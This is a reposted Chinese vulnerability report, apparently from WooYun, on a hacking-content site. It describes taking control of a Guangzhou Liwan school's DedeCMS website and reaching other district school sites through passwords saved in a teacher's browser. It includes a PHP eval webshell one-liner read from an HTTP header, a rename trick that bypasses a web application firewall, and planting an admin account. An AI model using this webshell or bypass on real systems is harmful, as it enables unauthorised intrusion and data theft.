记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

从对学校的渗透测试到控制广州市荔湾区所有学校官网

2016-07-05 20:35

漏洞接 http://**.**.**.**/bugs/wooyun-2016-0210607

在内网渗透测试过程中,发现了一个IP地址,是老师的电脑



QQ截图20160520182840.jpg





找了个非办公时间,电脑居然还开着,进去一探究竟【发洞截图时老师在只能随便截一张了】



这台电脑上面的傲游浏览器保存了许多密码...发现一个学校的官网~



QQ截图20160520191524.jpg





还保存了路径,登录发现权限很大,直接先加一个管理吧~



QQ截图20160520191659.jpg





既然是dedecms,直接文件管理器传shell,发现被加速乐拦截了,于是改名大法好先传txt上去,然后改名即可。



QQ截图20160520191815.jpg





(图上的是我在之前测试过程中留下的shell没删)



既然知道有加速乐,那就要绕过,简单地用 <?php eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?> 就可以执行命令了



QQ截图20160520192001.jpg





那么来获取一下真实ip



QQ截图20160520194938.jpg





改hosts,传一句话,菜刀连接



QQ截图20160520195202.jpg





来到www目录下看一看



QQ截图20160520195251.jpg





一堆荔湾的中小学还有幼儿园躺枪~



然后看一下数据库,信息位于/data/common.inc.php



QQ截图20160520195429.jpg





QQ截图20160520195540.jpg





数据库都在这里啦~就不继续深入了~

漏洞证明:

QQ截图20160520195251.jpg





QQ截图20160520195540.jpg

修复方案:

我也不知道~

知识来源: www.wooyun.org/bugs/wooyun-2016-0211045

阅读:76685 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“从对学校的渗透测试到控制广州市荔湾区所有学校官网”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云